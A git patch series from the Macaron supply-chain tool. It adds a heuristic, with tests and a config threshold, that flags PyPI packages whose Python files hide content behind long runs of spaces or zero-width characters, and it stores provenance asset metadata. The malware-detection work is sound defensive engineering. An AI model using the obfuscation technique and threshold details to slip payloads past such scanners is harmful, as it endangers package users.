From 28150280d3a46e4626863c8887be17e63d86f621 Mon Sep 17 00:00:00 2001 From: Amine Date: Mon, 19 May 2025 19:33:06 +0100 Subject: [PATCH 01/14] feat(heuristics): add Whitespace Check to detect excessive spacing and invisible characters Signed-off-by: Amine --- .gitignore | 1 + .../pypi_heuristics/heuristics.py | 3 + .../sourcecode/white_spaces.py | 98 +++++++++++++++++++ .../checks/detect_malicious_metadata_check.py | 7 ++ .../pypi/test_white_spaces.py | 70 +++++++++++++ 5 files changed, 179 insertions(+) create mode 100644 src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py create mode 100644 tests/malware_analyzer/pypi/test_white_spaces.py diff --git a/.gitignore b/.gitignore index 4bc971ba4..758a3d0cb 100644 --- a/.gitignore +++ b/.gitignore @@ -181,3 +181,4 @@ docs/_build bin/ requirements.txt .macaron_env_file +**/.DS_Store diff --git a/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py b/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py index bd829a0f1..3b23e13f7 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py @@ -37,6 +37,9 @@ class Heuristics(str, Enum): #: Indicates that the package has an unusually large version number for a single release. ANOMALOUS_VERSION = "anomalous_version" + #: Indicates that the package has a lot of white spaces or invisible characters in the code. + WHITE_SPACES = "white_spaces" + class HeuristicResult(str, Enum): """Result type indicating the outcome of a heuristic.""" diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py new file mode 100644 index 000000000..16521dba6 --- /dev/null +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py @@ -0,0 +1,98 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. 
+# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""This analyzer checks if the package has white spaces or invisible characters in the code.""" + +import logging +import re + +from macaron.config.defaults import defaults +from macaron.json_tools import JsonType +from macaron.malware_analyzer.pypi_heuristics.base_analyzer import BaseHeuristicAnalyzer +from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics +from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset + +logger: logging.Logger = logging.getLogger(__name__) + + +class WhiteSpacesAnalyzer(BaseHeuristicAnalyzer): + """Check whether the code has successive white spaces or invisible characters.""" + + INVISIBLE_CHARS = [ + "\u200b", + "\u200c", + "\u200d", + "\ufeff", + "\u200e", + "\u200f", + "\u00a0", + "\u00ad", + " ", + ] + + def __init__(self) -> None: + super().__init__( + name="white_spaces_analyzer", + heuristic=Heuristics.WHITE_SPACES, + depends_on=None, + ) + + self.repeated_spaces_threshold = self._load_defaults() + + def _load_defaults(self) -> int: + """Load default settings from defaults.ini. + + Returns + ------- + int: + The repeated spaces threshold. + """ + section_name = "heuristic.pypi" + if defaults.has_section(section_name): + section = defaults[section_name] + return section.getint("repeated_spaces_threshold", 50) + + return 50 + + def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: + """Analyze the package. + + Parameters + ---------- + pypi_package_json: PyPIPackageJsonAsset + The PyPI package JSON asset object. + + Returns + ------- + tuple[HeuristicResult, dict[str, JsonType]]: + The result and related information collected during the analysis. 
+ """ + scripts: dict[str, str] | None = pypi_package_json.get_sourcecode() + if scripts is None: + return HeuristicResult.SKIP, {} + + for file, content in scripts.items(): + if file.endswith(".py") and self.has_white_spaces(content): + return HeuristicResult.FAIL, { + "file": file, + } + return HeuristicResult.PASS, {} + + def has_white_spaces(self, code_string: str) -> bool: + """Check for excessive or invisible whitespace characters in a code string. + + Parameters + ---------- + code_string: str + The code string to check. + + Returns + ------- + bool: + True if suspicious patterns are found, False otherwise. + """ + char_class = "".join(self.INVISIBLE_CHARS) + regex_pattern = f"[{char_class}]{{{self.repeated_spaces_threshold},}}" + if re.search(regex_pattern, code_string, re.DOTALL): + return True + return False diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index c69de3bde..8bff93353 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -27,6 +27,7 @@ from macaron.malware_analyzer.pypi_heuristics.metadata.wheel_absence import WheelAbsenceAnalyzer from macaron.malware_analyzer.pypi_heuristics.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer from macaron.malware_analyzer.pypi_heuristics.sourcecode.suspicious_setup import SuspiciousSetupAnalyzer +from macaron.malware_analyzer.pypi_heuristics.sourcecode.white_spaces import WhiteSpacesAnalyzer from macaron.slsa_analyzer.analyze_context import AnalyzeContext from macaron.slsa_analyzer.checks.base_check import BaseCheck from macaron.slsa_analyzer.checks.check_result import CheckResultData, CheckResultType, Confidence, JustificationType @@ -332,6 +333,7 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: SuspiciousSetupAnalyzer, WheelAbsenceAnalyzer, AnomalousVersionAnalyzer, + 
WhiteSpacesAnalyzer, ] # name used to query the result of all problog rules, so it can be accessed outside the model. @@ -381,6 +383,10 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: failed({Heuristics.CLOSER_RELEASE_JOIN_DATE.value}), forceSetup. + % Package released with excessive whitespace in the code . + {Confidence.HIGH.value}::trigger(malware_high_confidence_4) :- + quickUndetailed, forceSetup, failed({Heuristics.WHITE_SPACES.value}). + % Package released recently with little detail, with multiple releases as a trust marker, but frequent and with % the same code. {Confidence.MEDIUM.value}::trigger(malware_medium_confidence_1) :- @@ -401,6 +407,7 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: {problog_result_access} :- trigger(malware_high_confidence_1). {problog_result_access} :- trigger(malware_high_confidence_2). {problog_result_access} :- trigger(malware_high_confidence_3). + {problog_result_access} :- trigger(malware_high_confidence_4). {problog_result_access} :- trigger(malware_medium_confidence_2). {problog_result_access} :- trigger(malware_medium_confidence_1). query({problog_result_access}). diff --git a/tests/malware_analyzer/pypi/test_white_spaces.py b/tests/malware_analyzer/pypi/test_white_spaces.py new file mode 100644 index 000000000..500ef00b5 --- /dev/null +++ b/tests/malware_analyzer/pypi/test_white_spaces.py @@ -0,0 +1,70 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. 
+ +"""Tests for the WhiteSpacesAnalyzer heuristic.""" +# pylint: disable=redefined-outer-name + + +from unittest.mock import MagicMock + +import pytest + +from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult +from macaron.malware_analyzer.pypi_heuristics.sourcecode.white_spaces import WhiteSpacesAnalyzer + + +@pytest.fixture() +def analyzer() -> WhiteSpacesAnalyzer: + """Pytest fixture to create a WhiteSpacesAnalyzer instance.""" + analyzer_instance = WhiteSpacesAnalyzer() + return analyzer_instance + + +def test_analyze_no_sourcecode(analyzer: WhiteSpacesAnalyzer, pypi_package_json: MagicMock) -> None: + """Test the analyzer skips when there is no source code.""" + pypi_package_json.get_sourcecode.return_value = None + result, info = analyzer.analyze(pypi_package_json) + assert result == HeuristicResult.SKIP + assert info == {} + + +def test_analyze_pass(analyzer: WhiteSpacesAnalyzer, pypi_package_json: MagicMock) -> None: + """Test the analyzer passes when no suspicious whitespace is found.""" + pypi_package_json.get_sourcecode.return_value = {"test.py": "print('hello')"} + result, info = analyzer.analyze(pypi_package_json) + assert result == HeuristicResult.PASS + assert info == {} + + +def test_analyze_fail_long_spaces(analyzer: WhiteSpacesAnalyzer, pypi_package_json: MagicMock) -> None: + """Test the analyzer fails when long spaces are found.""" + repeated_spaces_threshold = analyzer.repeated_spaces_threshold + code = f"print('hello')\n{' ' * (repeated_spaces_threshold + 1)}print('world')" + pypi_package_json.get_sourcecode.return_value = {"test.py": code} + result, info = analyzer.analyze(pypi_package_json) + assert result == HeuristicResult.FAIL + assert info["file"] == "test.py" + + +def test_analyze_fail_invisible_chars(analyzer: WhiteSpacesAnalyzer, pypi_package_json: MagicMock) -> None: + """Test the analyzer fails when invisible characters are found.""" + repeated_spaces_threshold = analyzer.repeated_spaces_threshold + 
invisible_char = "\u200b" # Zero-width space. + code = f"print('hello'){invisible_char * repeated_spaces_threshold}print('world')" + pypi_package_json.get_sourcecode.return_value = {"test.py": code} + result, info = analyzer.analyze(pypi_package_json) + assert result == HeuristicResult.FAIL + assert info["file"] == "test.py" + + +def test_has_white_spaces_long_spaces(analyzer: WhiteSpacesAnalyzer) -> None: + """Test has_white_spaces method with long spaces.""" + repeated_spaces_threshold = analyzer.repeated_spaces_threshold + code = f"print('hello')\n{' ' * repeated_spaces_threshold}print('world')" + assert analyzer.has_white_spaces(code) + + +def test_has_white_spaces_no_suspicious(analyzer: WhiteSpacesAnalyzer) -> None: + """Test has_white_spaces method with no suspicious whitespace.""" + code = "print('hello')\nprint('world')" + assert not analyzer.has_white_spaces(code) From 6978bd765c84066ee7d17cb8b6ab84ed990b1930 Mon Sep 17 00:00:00 2001 From: Amine Date: Mon, 26 May 2025 10:51:13 +0100 Subject: [PATCH 02/14] chore: add config variable to defaults.ini and minor cleanup Signed-off-by: Amine --- .gitignore | 2 +- src/macaron/config/defaults.ini | 2 ++ .../pypi_heuristics/sourcecode/white_spaces.py | 9 +++++++-- .../checks/detect_malicious_metadata_check.py | 2 +- 4 files changed, 11 insertions(+), 4 deletions(-) diff --git a/.gitignore b/.gitignore index 758a3d0cb..ddf49dfd0 100644 --- a/.gitignore +++ b/.gitignore @@ -181,4 +181,4 @@ docs/_build bin/ requirements.txt .macaron_env_file -**/.DS_Store +.DS_Store diff --git a/src/macaron/config/defaults.ini b/src/macaron/config/defaults.ini index c46e09ce1..1111b3faf 100644 --- a/src/macaron/config/defaults.ini +++ b/src/macaron/config/defaults.ini @@ -600,3 +600,5 @@ major_threshold = 20 epoch_threshold = 3 # The number of days +/- the day of publish the calendar versioning day may be. day_publish_error = 4 +# THe threshold for the number of repeated spaces in a line from the source code. 
+repeated_spaces_threshold = diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py index 16521dba6..0807afd80 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py @@ -48,11 +48,16 @@ def _load_defaults(self) -> int: The repeated spaces threshold. """ section_name = "heuristic.pypi" + default_threshold = 50 + if defaults.has_section(section_name): section = defaults[section_name] - return section.getint("repeated_spaces_threshold", 50) + value_str = section.get("repeated_spaces_threshold", fallback=str(default_threshold)) + if value_str is not None and value_str.isdigit(): + return int(value_str) + return default_threshold - return 50 + return default_threshold def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: """Analyze the package. diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index 8bff93353..7c83f637f 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -385,7 +385,7 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: % Package released with excessive whitespace in the code . {Confidence.HIGH.value}::trigger(malware_high_confidence_4) :- - quickUndetailed, forceSetup, failed({Heuristics.WHITE_SPACES.value}). + forceSetup, failed({Heuristics.WHITE_SPACES.value}). % Package released recently with little detail, with multiple releases as a trust marker, but frequent and with % the same code. 
From 76bc6dcbd9929071db31bd4feecb5ea1333dda6a Mon Sep 17 00:00:00 2001 From: Ben Selwyn-Smith Date: Thu, 29 May 2025 15:19:25 +1000 Subject: [PATCH 03/14] chore: store provenance asset info (#975) Signed-off-by: Ben Selwyn-Smith --- docs/source/assets/er-diagram.svg | 1592 +++++++++-------- src/macaron/database/table_definitions.py | 9 +- src/macaron/provenance/provenance_finder.py | 60 +- src/macaron/provenance/provenance_verifier.py | 26 +- .../repo_finder/repo_finder_deps_dev.py | 20 +- src/macaron/slsa_analyzer/analyzer.py | 15 +- .../checks/provenance_available_check.py | 23 +- .../cases/provenance_available/policy.dl | 17 + .../cases/provenance_available/test.yaml | 20 + .../repo_finder/test_repo_finder_deps_dev.py | 5 +- 10 files changed, 1011 insertions(+), 776 deletions(-) create mode 100644 tests/integration/cases/provenance_available/policy.dl create mode 100644 tests/integration/cases/provenance_available/test.yaml diff --git a/docs/source/assets/er-diagram.svg b/docs/source/assets/er-diagram.svg index e61539047..33520a9ba 100644 --- a/docs/source/assets/er-diagram.svg +++ b/docs/source/assets/er-diagram.svg @@ -1,958 +1,1118 @@ - - - - -%3 - + + + + _analysis - -_analysis - -id - [INTEGER] - NOT NULL - -analysis_time - [VARCHAR] - NOT NULL - -macaron_version - [VARCHAR] - NOT NULL + +_analysis + +id + + [INTEGER] + NOT NULL + +analysis_time + + [VARCHAR] + NOT NULL + +macaron_version + + [VARCHAR] + NOT NULL _component - -_component - -id - [INTEGER] - NOT NULL - -analysis_id - [INTEGER] - NOT NULL - -name - [VARCHAR(100)] - NOT NULL - -namespace - [VARCHAR(255)] - -purl - [VARCHAR] - NOT NULL - -qualifiers - [VARCHAR(1024)] - -subpath - [VARCHAR(200)] - -type - [VARCHAR(16)] - NOT NULL - -version - [VARCHAR(100)] + +_component + +id + + [INTEGER] + NOT NULL + +analysis_id + + [INTEGER] + NOT NULL + +name + + [VARCHAR(100)] + NOT NULL + +namespace + + [VARCHAR(255)] + +purl + + [VARCHAR] + NOT NULL + +qualifiers + + [VARCHAR(1024)] + +subpath + + 
[VARCHAR(200)] + +type + + [VARCHAR(16)] + NOT NULL + +version + + [VARCHAR(100)] _analysis--_component - -0..N -1 + +0..N +1 _check_facts - -_check_facts - -id - [INTEGER] - NOT NULL - -check_result_id - [INTEGER] - NOT NULL - -check_type - [VARCHAR] - NOT NULL - -component_id - [INTEGER] - NOT NULL - -confidence - [FLOAT] - NOT NULL + +_check_facts + +id + + [INTEGER] + NOT NULL + +check_result_id + + [INTEGER] + NOT NULL + +check_type + + [VARCHAR] + NOT NULL + +component_id + + [INTEGER] + NOT NULL + +confidence + + [FLOAT] + NOT NULL _component--_check_facts - -0..N -1 + +0..N +1 _check_result - -_check_result - -id - [INTEGER] - NOT NULL - -check_id - [VARCHAR] - NOT NULL - -component_id - [INTEGER] - NOT NULL - -passed - [BOOLEAN] - NOT NULL + +_check_result + +id + + [INTEGER] + NOT NULL + +check_id + + [VARCHAR] + NOT NULL + +component_id + + [INTEGER] + NOT NULL + +passed + + [BOOLEAN] + NOT NULL _component--_check_result - -0..N -1 + +0..N +1 _dependency - -_dependency - -child_component - [INTEGER] - NOT NULL - -parent_component - [INTEGER] - NOT NULL + +_dependency + +child_component + + [INTEGER] + NOT NULL + +parent_component + + [INTEGER] + NOT NULL _component--_dependency - -1 -1 + +1 +1 _component--_dependency - -1 -1 + +1 +1 _provenance - -_provenance - -id - [INTEGER] - NOT NULL - -commit_sha - [VARCHAR] - -component_id - [INTEGER] - NOT NULL - -provenance_payload - [VARCHAR] - NOT NULL - -release_commit_sha - [VARCHAR] - -release_tag - [VARCHAR] - -repository_url - [VARCHAR] - -slsa_level - [INTEGER] - NOT NULL - -slsa_version - [VARCHAR] - -verified - [BOOLEAN] - NOT NULL + +_provenance + +id + + [INTEGER] + NOT NULL + +commit_sha + + [VARCHAR] + +component_id + + [INTEGER] + NOT NULL + +provenance_asset_name + + [VARCHAR] + +provenance_asset_url + + [VARCHAR] + +provenance_payload + + [VARCHAR] + NOT NULL + +release_commit_sha + + [VARCHAR] + +release_tag + + [VARCHAR] + +repository_url + + [VARCHAR] + +slsa_level + + [INTEGER] + NOT NULL + 
+slsa_version + + [VARCHAR] + +verified + + [BOOLEAN] + NOT NULL _component--_provenance - -0..N -1 + +0..N +1 _provenance_subject - -_provenance_subject - -id - [INTEGER] - NOT NULL - -component_id - [INTEGER] - NOT NULL - -sha256 - [VARCHAR] - NOT NULL + +_provenance_subject + +id + + [INTEGER] + NOT NULL + +component_id + + [INTEGER] + NOT NULL + +sha256 + + [VARCHAR] + NOT NULL _component--_provenance_subject - -0..N -1 + +0..N +1 _repo_finder_metadata - -_repo_finder_metadata - -id - [INTEGER] - NOT NULL - -commit_finder_outcome - [VARCHAR(21)] - NOT NULL - -component_id - [INTEGER] - NOT NULL - -found_commit - [VARCHAR] - NOT NULL - -found_url - [VARCHAR] - NOT NULL - -repo_finder_outcome - [VARCHAR(24)] - NOT NULL + +_repo_finder_metadata + +id + + [INTEGER] + NOT NULL + +commit_finder_outcome + + [VARCHAR(21)] + NOT NULL + +component_id + + [INTEGER] + NOT NULL + +found_commit + + [VARCHAR] + NOT NULL + +found_url + + [VARCHAR] + NOT NULL + +repo_finder_outcome + + [VARCHAR(24)] + NOT NULL _component--_repo_finder_metadata - -0..N -1 + +0..N +1 _repository - -_repository - -id - [INTEGER] - NOT NULL - -branch_name - [VARCHAR] - -commit_date - [VARCHAR] - NOT NULL - -commit_sha - [VARCHAR] - NOT NULL - -complete_name - [VARCHAR] - NOT NULL - -component_id - [INTEGER] - NOT NULL - -fs_path - [VARCHAR] - NOT NULL - -full_name - [VARCHAR] - NOT NULL - -name - [VARCHAR] - NOT NULL - -owner - [VARCHAR] - -release_tag - [VARCHAR] - -remote_path - [VARCHAR] - NOT NULL - -type - [VARCHAR] - NOT NULL + +_repository + +id + + [INTEGER] + NOT NULL + +branch_name + + [VARCHAR] + +commit_date + + [VARCHAR] + NOT NULL + +commit_sha + + [VARCHAR] + NOT NULL + +complete_name + + [VARCHAR] + NOT NULL + +component_id + + [INTEGER] + NOT NULL + +fs_path + + [VARCHAR] + NOT NULL + +full_name + + [VARCHAR] + NOT NULL + +name + + [VARCHAR] + NOT NULL + +owner + + [VARCHAR] + +release_tag + + [VARCHAR] + +remote_path + + [VARCHAR] + NOT NULL + +type + + [VARCHAR] + NOT NULL 
_component--_repository - -0..N -1 + +0..N +1 _slsa_level - -_slsa_level - -component_id - [INTEGER] - NOT NULL - -reached - [BOOLEAN] - NOT NULL - -slsa_level - [INTEGER] - NOT NULL + +_slsa_level + +component_id + + [INTEGER] + NOT NULL + +reached + + [BOOLEAN] + NOT NULL + +slsa_level + + [INTEGER] + NOT NULL _component--_slsa_level - -1 -1 + +1 +1 _slsa_requirement - -_slsa_requirement - -id - [INTEGER] - NOT NULL - -component_id - [INTEGER] - NOT NULL - -feedback - [VARCHAR] - -requirement_name - [VARCHAR(27)] - NOT NULL - -requirement_short_description - [VARCHAR] + +_slsa_requirement + +id + + [INTEGER] + NOT NULL + +component_id + + [INTEGER] + NOT NULL + +feedback + + [VARCHAR] + +requirement_name + + [VARCHAR(27)] + NOT NULL + +requirement_short_description + + [VARCHAR] _component--_slsa_requirement - -0..N -1 + +0..N +1 _artifact_pipeline_check - -_artifact_pipeline_check - -id - [INTEGER] - NOT NULL - -deploy_job - [VARCHAR] - -deploy_step - [VARCHAR] - -deploy_workflow - [VARCHAR] - -from_provenance - [BOOLEAN] - NOT NULL - -published_before_commit - [BOOLEAN] - NOT NULL - -run_deleted - [BOOLEAN] - NOT NULL - -run_url - [VARCHAR] + +_artifact_pipeline_check + +id + + [INTEGER] + NOT NULL + +deploy_job + + [VARCHAR] + +deploy_step + + [VARCHAR] + +deploy_workflow + + [VARCHAR] + +from_provenance + + [BOOLEAN] + NOT NULL + +published_before_commit + + [BOOLEAN] + NOT NULL + +run_deleted + + [BOOLEAN] + NOT NULL + +run_url + + [VARCHAR] _check_facts--_artifact_pipeline_check - -1 -1 + +1 +1 _build_as_code_check - -_build_as_code_check - -id - [INTEGER] - NOT NULL - -build_tool_name - [VARCHAR] - NOT NULL - -build_trigger - [VARCHAR] - -ci_service_name - [VARCHAR] - NOT NULL - -deploy_command - [VARCHAR] - -language - [VARCHAR] - NOT NULL - -language_distributions - [VARCHAR] - -language_url - [VARCHAR] - -language_versions - [VARCHAR] + +_build_as_code_check + +id + + [INTEGER] + NOT NULL + +build_tool_name + + [VARCHAR] + NOT NULL + +build_trigger + + 
[VARCHAR] + +ci_service_name + + [VARCHAR] + NOT NULL + +deploy_command + + [VARCHAR] + +language + + [VARCHAR] + NOT NULL + +language_distributions + + [VARCHAR] + +language_url + + [VARCHAR] + +language_versions + + [VARCHAR] _check_facts--_build_as_code_check - -1 -1 + +1 +1 _build_script_check - -_build_script_check - -id - [INTEGER] - NOT NULL - -build_tool_command - [VARCHAR] - -build_tool_name - [VARCHAR] - NOT NULL - -build_trigger - [VARCHAR] - -ci_service_name - [VARCHAR] - NOT NULL - -language - [VARCHAR] - NOT NULL - -language_distributions - [VARCHAR] - -language_url - [VARCHAR] - -language_versions - [VARCHAR] + +_build_script_check + +id + + [INTEGER] + NOT NULL + +build_tool_command + + [VARCHAR] + +build_tool_name + + [VARCHAR] + NOT NULL + +build_trigger + + [VARCHAR] + +ci_service_name + + [VARCHAR] + NOT NULL + +language + + [VARCHAR] + NOT NULL + +language_distributions + + [VARCHAR] + +language_url + + [VARCHAR] + +language_versions + + [VARCHAR] _check_facts--_build_script_check - -1 -1 + +1 +1 _build_service_check - -_build_service_check - -id - [INTEGER] - NOT NULL - -build_command - [VARCHAR] - -build_tool_name - [VARCHAR] - NOT NULL - -build_trigger - [VARCHAR] - -ci_service_name - [VARCHAR] - NOT NULL - -language - [VARCHAR] - NOT NULL - -language_distributions - [VARCHAR] - -language_url - [VARCHAR] - -language_versions - [VARCHAR] + +_build_service_check + +id + + [INTEGER] + NOT NULL + +build_command + + [VARCHAR] + +build_tool_name + + [VARCHAR] + NOT NULL + +build_trigger + + [VARCHAR] + +ci_service_name + + [VARCHAR] + NOT NULL + +language + + [VARCHAR] + NOT NULL + +language_distributions + + [VARCHAR] + +language_url + + [VARCHAR] + +language_versions + + [VARCHAR] _check_facts--_build_service_check - -1 -1 + +1 +1 _build_tool_check - -_build_tool_check - -id - [INTEGER] - NOT NULL - -build_tool_name - [VARCHAR] - NOT NULL - -language - [VARCHAR] - NOT NULL + +_build_tool_check + +id + + [INTEGER] + NOT NULL + +build_tool_name + 
+ [VARCHAR] + NOT NULL + +language + + [VARCHAR] + NOT NULL _check_facts--_build_tool_check - -1 -1 + +1 +1 _cue_expectation - -_cue_expectation - -id - [INTEGER] - NOT NULL - -asset_url - [VARCHAR] - -description - [VARCHAR] - NOT NULL - -expectation_type - [VARCHAR] - NOT NULL - -path - [VARCHAR] - NOT NULL - -sha - [VARCHAR] - -target - [VARCHAR] - NOT NULL - -text - [VARCHAR] + +_cue_expectation + +id + + [INTEGER] + NOT NULL + +asset_url + + [VARCHAR] + +description + + [VARCHAR] + NOT NULL + +expectation_type + + [VARCHAR] + NOT NULL + +path + + [VARCHAR] + NOT NULL + +sha + + [VARCHAR] + +target + + [VARCHAR] + NOT NULL + +text + + [VARCHAR] _check_facts--_cue_expectation - -1 -1 + +1 +1 _detect_malicious_metadata_check - -_detect_malicious_metadata_check - -id - [INTEGER] - NOT NULL - -detail_information - [JSON] - NOT NULL - -known_malware - [VARCHAR] - -result - [JSON] - NOT NULL + +_detect_malicious_metadata_check + +id + + [INTEGER] + NOT NULL + +detail_information + + [JSON] + NOT NULL + +known_malware + + [VARCHAR] + +result + + [JSON] + NOT NULL _check_facts--_detect_malicious_metadata_check - -1 -1 + +1 +1 _github_actions_vulnerabilities_check - -_github_actions_vulnerabilities_check - -id - [INTEGER] - NOT NULL - -caller_workflow - [VARCHAR] - NOT NULL - -github_actions_id - [VARCHAR] - NOT NULL - -github_actions_version - [VARCHAR] - NOT NULL - -vulnerability_urls - [JSON] - NOT NULL + +_github_actions_vulnerabilities_check + +id + + [INTEGER] + NOT NULL + +caller_workflow + + [VARCHAR] + NOT NULL + +github_actions_id + + [VARCHAR] + NOT NULL + +github_actions_version + + [VARCHAR] + NOT NULL + +vulnerability_urls + + [JSON] + NOT NULL _check_facts--_github_actions_vulnerabilities_check - -1 -1 + +1 +1 _provenance_available_check - -_provenance_available_check - -id - [INTEGER] - NOT NULL - -asset_name - [VARCHAR] - -asset_url - [VARCHAR] + +_provenance_available_check + +id + + [INTEGER] + NOT NULL + +asset_name + + [VARCHAR] + +asset_url + + 
[VARCHAR] _check_facts--_provenance_available_check - -1 -1 + +1 +1 _provenance_derived_commit_check - -_provenance_derived_commit_check - -id - [INTEGER] - NOT NULL - -commit_info - [VARCHAR] + +_provenance_derived_commit_check + +id + + [INTEGER] + NOT NULL + +commit_info + + [VARCHAR] _check_facts--_provenance_derived_commit_check - -1 -1 + +1 +1 _provenance_derived_repo_check - -_provenance_derived_repo_check - -id - [INTEGER] - NOT NULL - -repository_info - [VARCHAR] + +_provenance_derived_repo_check + +id + + [INTEGER] + NOT NULL + +repository_info + + [VARCHAR] _check_facts--_provenance_derived_repo_check - -1 -1 + +1 +1 _provenance_verified_check - -_provenance_verified_check - -id - [INTEGER] - NOT NULL - -build_level - [INTEGER] - NOT NULL - -build_type - [VARCHAR] + +_provenance_verified_check + +id + + [INTEGER] + NOT NULL + +build_level + + [INTEGER] + NOT NULL + +build_type + + [VARCHAR] _check_facts--_provenance_verified_check - -1 -1 + +1 +1 _provenance_witness_l1_check - -_provenance_witness_l1_check - -id - [INTEGER] - NOT NULL - -artifact_url - [VARCHAR] - -provenance_name - [VARCHAR] - NOT NULL - -provenance_url - [VARCHAR] + +_provenance_witness_l1_check + +id + + [INTEGER] + NOT NULL + +artifact_url + + [VARCHAR] + +provenance_name + + [VARCHAR] + NOT NULL + +provenance_url + + [VARCHAR] _check_facts--_provenance_witness_l1_check - -1 -1 + +1 +1 _scm_authenticity_check - -_scm_authenticity_check - -id - [INTEGER] - NOT NULL - -build_tool - [VARCHAR] - NOT NULL - -fork_count - [INTEGER] - -reason - [VARCHAR] - NOT NULL - -repo_link - [VARCHAR] - -stars_count - [INTEGER] - -status - [VARCHAR] - NOT NULL + +_scm_authenticity_check + +id + + [INTEGER] + NOT NULL + +build_tool + + [VARCHAR] + NOT NULL + +fork_count + + [INTEGER] + +reason + + [VARCHAR] + NOT NULL + +repo_link + + [VARCHAR] + +stars_count + + [INTEGER] + +status + + [VARCHAR] + NOT NULL _check_facts--_scm_authenticity_check - -1 -1 + +1 +1 _trusted_builder_check - 
-_trusted_builder_check - -id - [INTEGER] - NOT NULL - -build_tool_name - [VARCHAR] - NOT NULL - -build_trigger - [VARCHAR] - -ci_service_name - [VARCHAR] - NOT NULL + +_trusted_builder_check + +id + + [INTEGER] + NOT NULL + +build_tool_name + + [VARCHAR] + NOT NULL + +build_trigger + + [VARCHAR] + +ci_service_name + + [VARCHAR] + NOT NULL _check_facts--_trusted_builder_check - -1 -1 + +1 +1 _vcs_check - -_vcs_check - -id - [INTEGER] - NOT NULL - -git_repo - [VARCHAR] + +_vcs_check + +id + + [INTEGER] + NOT NULL + +git_repo + + [VARCHAR] _check_facts--_vcs_check - -1 -1 + +1 +1 _check_result--_check_facts - -0..N -1 + +0..N +1 _release_artifact - -_release_artifact - -id - [INTEGER] - NOT NULL - -name - [VARCHAR] - NOT NULL - -provenance_id - [INTEGER] - -slsa_verified - [BOOLEAN] + +_release_artifact + +id + + [INTEGER] + NOT NULL + +name + + [VARCHAR] + NOT NULL + +provenance_id + + [INTEGER] + +slsa_verified + + [BOOLEAN] _provenance--_release_artifact - -0..N -{0,1} + +0..N +{0,1} _hash_digest - -_hash_digest - -id - [INTEGER] - NOT NULL - -artifact_id - [INTEGER] - NOT NULL - -digest - [VARCHAR] - NOT NULL - -digest_algorithm - [VARCHAR] - NOT NULL + +_hash_digest + +id + + [INTEGER] + NOT NULL + +artifact_id + + [INTEGER] + NOT NULL + +digest + + [VARCHAR] + NOT NULL + +digest_algorithm + + [VARCHAR] + NOT NULL _release_artifact--_hash_digest - -0..N -1 + +0..N +1 diff --git a/src/macaron/database/table_definitions.py b/src/macaron/database/table_definitions.py index 2a7f1e95a..be8928ce4 100644 --- a/src/macaron/database/table_definitions.py +++ b/src/macaron/database/table_definitions.py @@ -499,9 +499,6 @@ class Provenance(ORMBase): #: The release tag commit sha. release_commit_sha: Mapped[str] = mapped_column(String, nullable=True) - #: The release tag. - release_tag: Mapped[str] = mapped_column(String, nullable=True) - #: The repository URL from the provenance. 
repository_url: Mapped[str] = mapped_column(String, nullable=True) @@ -511,6 +508,12 @@ class Provenance(ORMBase): #: The provenance payload. provenance_payload: Mapped[InTotoPayload] = mapped_column(ProvenancePayload, nullable=False) + #: The name of the provenance asset. + provenance_asset_name: Mapped[str] = mapped_column(String, nullable=True) + + #: The URL of the provenance asset. + provenance_asset_url: Mapped[str] = mapped_column(String, nullable=True) + #: The verified status of the provenance. verified: Mapped[bool] = mapped_column(Boolean, nullable=False, default=False) diff --git a/src/macaron/provenance/provenance_finder.py b/src/macaron/provenance/provenance_finder.py index 853a3a3cd..715204a16 100644 --- a/src/macaron/provenance/provenance_finder.py +++ b/src/macaron/provenance/provenance_finder.py @@ -6,6 +6,7 @@ import logging import os import tempfile +from dataclasses import dataclass from functools import partial from packageurl import PackageURL @@ -30,6 +31,15 @@ logger: logging.Logger = logging.getLogger(__name__) +@dataclass(frozen=True) +class ProvenanceAsset: + """This class exists to hold a provenance payload with the original asset's name and URL.""" + + payload: InTotoPayload + name: str + url: str + + class ProvenanceFinder: """This class is used to find and retrieve provenance files from supported registries.""" @@ -44,7 +54,7 @@ def __init__(self) -> None: elif 